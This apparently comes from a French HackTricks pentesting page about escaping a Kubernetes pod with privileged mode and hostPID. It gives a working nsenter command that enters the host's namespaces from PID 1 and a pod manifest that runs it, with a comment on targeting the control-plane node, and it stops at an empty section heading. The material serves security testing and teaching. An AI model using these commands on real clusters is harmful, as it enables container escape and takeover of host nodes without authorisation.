Pod Escape Privileges

Soutenez HackTricks et bénéficiez d'avantages !

Privilèges et hostPID

Avec ces privilèges, vous aurez accès aux processus hôtes et suffisamment de privilèges pour entrer dans l'espace de noms de l'un des processus hôtes. Notez que vous pouvez potentiellement ne pas avoir besoin de privilèges, mais simplement de certaines capacités et de potentielles contournements de défenses (comme apparmor et/ou seccomp).

L'exécution de quelque chose comme ce qui suit vous permettra de vous échapper du pod :

nsenter --target 1 --mount --uts --ipc --net --pid -- bash

Exemple de configuration :

apiVersion: v1
kind: Pod
metadata:
  name: priv-and-hostpid-exec-pod
  labels:
    app: pentest
spec:
  hostPID: true
  containers:
  - name: priv-and-hostpid-pod
    image: ubuntu
    tty: true
    securityContext:
      privileged: true
    command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ]
  #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name

Privilèges uniquement

Dernière mise à jour